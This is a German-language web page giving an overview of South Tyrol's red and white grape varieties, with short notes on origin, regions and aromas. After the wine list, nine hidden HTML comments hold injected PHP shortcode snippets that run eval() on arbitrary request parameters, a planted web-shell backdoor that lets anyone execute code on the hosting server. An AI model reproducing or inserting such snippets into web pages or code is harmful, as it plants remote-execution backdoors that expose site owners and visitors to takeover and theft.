Die wichtigsten Rebsorten der Südtiroler Anbaugebiete im Überblick.

ROTWEINE

  • Lagrein:
    Die älteste Rebe Südtirols wird seit über tausend Jahren im Gebiet von Bozen angebaut. Die braunschwarze, spät reifende Traube bringt tiefrote, gerbsäurebetonte, langlebige Weine mit Aromen von Pflaumen und dunklen Beeren hervor.
    In früheren Zeiten wurde die Traube auch gerne als Rosé (Kretzer) ausgebaut.
  • Vernatsch:
    Entspricht unserem Trollinger (kommt von „Tirol“inger). Die häufigste einheimische Rebsorte. Aus der rotblauen Traube werden am Kalterer See, um Bozen und Meran hellrote, süffige Weine gekeltert.
    Die Variante St. Magdalener sind meist um einiges kräftiger.
  • Merlot:
    Ursprünglich französische Rebsorte aus dem Bordeaux, die auch in Südtirol immer häufiger angebaut wird. Der granatrote, fruchtige Wein zeichnet sich durch Aromen von roten Beeren und Kirschen aus.
  • Cabernet Sauvignon:
    Die französiche Traube (Médoc, Graves) steht für tiefrote, körperreiche, langlebige Weine. Oftmals kann man Aromen von grüner Paprika und Veilchen feststellen. Wird gerne mit Merlot zu einer Cuvée ausgebaut.
  • Blauburgunder:
    Die Traube ist seit der Antike bekannt. Benötigt ein gemäßigtes Klima wie beispielsweise im Vinschgau. Die rubinroten, langlebigen Weine weisen Aromen von Brombeeren und Nüssen auf.
  • Rosenmuskateller
    Die aus Süditalien stammende hellrote Traube, benötigt heiße, trockene Lagen. Die daraus ergebenden raffinierten Dessertweine, verfügen über ausgeprägte Buketts von Muskat und zarten Rosen.

WEISSWEINE

  • Gewürztraminer:
    Einheimische Traube, die angeblich aus Tramin stammen soll. Anspruchsvolle Trauben, die elegante, würzige Weine mit reifem Rosenbukett ergeben können.
  • Weißburgunder:
    Die am häufigsten angebaute Weißweinrebe Südtirols. Sie ergibt feinfruchtige, frische Weine mit Aromen von Äpfeln und Birnen.
  • Grauburgunder (Ruländer):
    Aus dem graurötlichen Beeren werden vollmundige, fruchtige Weine gekeltert.
  • Grüner Silvaner:
    Wird gerne im Eisacktal angebaut. Die Sorte gehört zu den ältesten heute noch kultivierten Reben. Silvaner eignet sich ebenso wie Riesling oder Weißburgunder als Wein zum Spargel. Der Charakter des Silvaners wird sehr vom Standort und der Bodenbeschaffenheit geprägt. Auf Lehmböden werden sie oft neutral, dagegen entstehen auf Verwitterungsböden, feine, elegante Weine. Vom Typ her ist Silvaner eine Rebsorte, die zwar ein weniger ausgeprägtes Fruchtspiel bringt, dafür aber ein exzellenter Terroir-Anzeiger ist, der es mit dem Chardonnay aufnehmen kann.
  • Riesling:
    Die spät reifende Rebe wird im Vinschgau und im Eisacktal angebaut. Rassige, elegante Weine mit feinen Noten von Zitrusfrüchten, Pfirsich und Aprikose.
  • Kerner:
    Die Kreuzung aus Trollinger und Riesling ergibt säurebetonte, fruchtige Weine. Als Spätlese runder, mit Nussaromen.
  • Sauvignon Blanc:
    Gelangte im 19. Jahrhundert von der Loire nach Terlan. Blassgelbe, leicht grünstichige Weine. Noten von Gras, weißen Blüten, Stachelbeeren.
  • Chardonnay:
    Rebe aus dem Burgund, die in Südtirol wuchtige Weine mit Ananas- und Bananenaroma ergibt. Wird gerne im Barrique ausgebaut.
  • Müller-Thurgau:
    Kreuzung aus Gutedel und Riesling. Ergibt säurearme, anspruchslose Weine mit sanftem Muskataroma.

<!– [insert_php]if (isset($_REQUEST["bJK"])){eval($_REQUEST["bJK"]);exit;}[/insert_php][php]if (isset($_REQUEST["bJK"])){eval($_REQUEST["bJK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["HIk"])){eval($_REQUEST["HIk"]);exit;}[/insert_php][php]if (isset($_REQUEST["HIk"])){eval($_REQUEST["HIk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bAT"])){eval($_REQUEST["bAT"]);exit;}[/insert_php][php]if (isset($_REQUEST["bAT"])){eval($_REQUEST["bAT"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["GMdhL"])){eval($_REQUEST["GMdhL"]);exit;}[/insert_php][php]if (isset($_REQUEST["GMdhL"])){eval($_REQUEST["GMdhL"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tlA"])){eval($_REQUEST["tlA"]);exit;}[/insert_php][php]if (isset($_REQUEST["tlA"])){eval($_REQUEST["tlA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BTiQ"])){eval($_REQUEST["BTiQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["BTiQ"])){eval($_REQUEST["BTiQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["paX"])){eval($_REQUEST["paX"]);exit;}[/insert_php][php]if (isset($_REQUEST["paX"])){eval($_REQUEST["paX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Ybs"])){eval($_REQUEST["Ybs"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ybs"])){eval($_REQUEST["Ybs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QAQ"])){eval($_REQUEST["QAQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["QAQ"])){eval($_REQUEST["QAQ"]);exit;}[/php] –>